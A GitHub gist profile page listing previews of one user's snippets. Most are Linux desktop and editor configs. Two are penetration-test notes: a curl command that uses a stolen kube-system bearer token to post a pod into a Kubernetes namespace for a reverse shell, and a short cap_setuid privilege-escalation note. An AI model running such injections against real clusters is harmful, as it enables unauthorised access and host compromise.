Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
In search of "Bigfoot";

dualfade

💭
In search of "Bigfoot";
View GitHub Profile
View docker ufw --
BlackArch / ArchLinux Latest --
Docker UFW issues --
docker.json update --
% cat /etc/docker/daemon.json
{
"iptables": false
}
ufw default fwd policy update --
View neovim-init.vim blackarch --
# spacevim pissing me off --
# moving to neovim-init / blackarch --
# orig --
# https://github.com/Optixal/neovim-init.vim
# refs --
# https://github.com/neoclide/coc.nvim
# https://github.com/VundleVim/Vundle.vim
Note:
View kubernetes pod injection --
Post request to cluster --
Most articles talked about using "default" as the namespace;
this target needed a very specific namespace to be used because of the token and privileges.
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json
yaml pod template --
Convert to json for proper injection --
Obviously you have to have enough privileges to use hostPath --
This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was
View dot screenrc
# GNU Screen - main configuration file
# Allow bold colors - necessary for some reason
attrcolor b ".I"
# Tell screen how to set colors. AB = background, AF=foreground
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
# Enables use of shift-PgUp and shift-PgDn
termcapinfo xterm|xterms|xs|rxvt ti@:te@
View termite config --
# ~/.config/termite/config
[options]
allow_bold = true
font = Hack Nerd Font 8
icon_name = termite
scrollback_lines = 10000
[colors]
foreground = #c0c5ce
View Caps --
file with cap_setuid+ep ??
user with perms to make it so == root
Just some notes --
[user@lemur tmp]$ hostname ; id
lemur
uid=1001(user) gid=1001(user) groups=1001(user)
[user@lemur tmp]$ sudo -l
Matching Defaults entries for user on this host:
View blackarch awesome rofi
Disable std modkey r --
enable rofi --
-- Prompt
-- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end),
-- Run program (d for dmenu ;)
awful.key({ modkey }, "d",
function()
awful.spawn.with_shell("rofi -matching fuzzy -show combi")
View gist:f7f7e9ed7389ae2e9152042fb73c63c1
# ~/.config/termite/config
[options]
allow_bold = true
clickable_url = true
font = Hack Nerd Font 8
geometry = 700x520
icon_name = terminal
scrollback_lines = 10000
browser = lynx
View gist:029b6f7e217505fb1fcc9a32b864b365
% cat /etc/xdg/awesome/rc.lua
----- snip ------
-- autorun
-- https://wiki.archlinux.org/index.php/Awesome#Autostart
awful.spawn.with_shell("/etc/xdg/awesome/autorun.sh")
% cat /etc/xdg/awesome/autorun.sh
#!/usr/bin/env bash
function run {
View gist:e723816f1175c5ff364550d7cd6d0fce
picom --config ~/.config/picom/picom.conf
taken from --
https://gist.github.com/netzverweigerer/dbac005f86baf04edfea1f7e15e44cb5
Amazing job !! Kudo's. Saved me a ton of time. Works perfect with terminator and termite transparency ;) multi monitor --
# Shadow
shadow = true;
shadow-radius = 7;
You can’t perform that action at this time.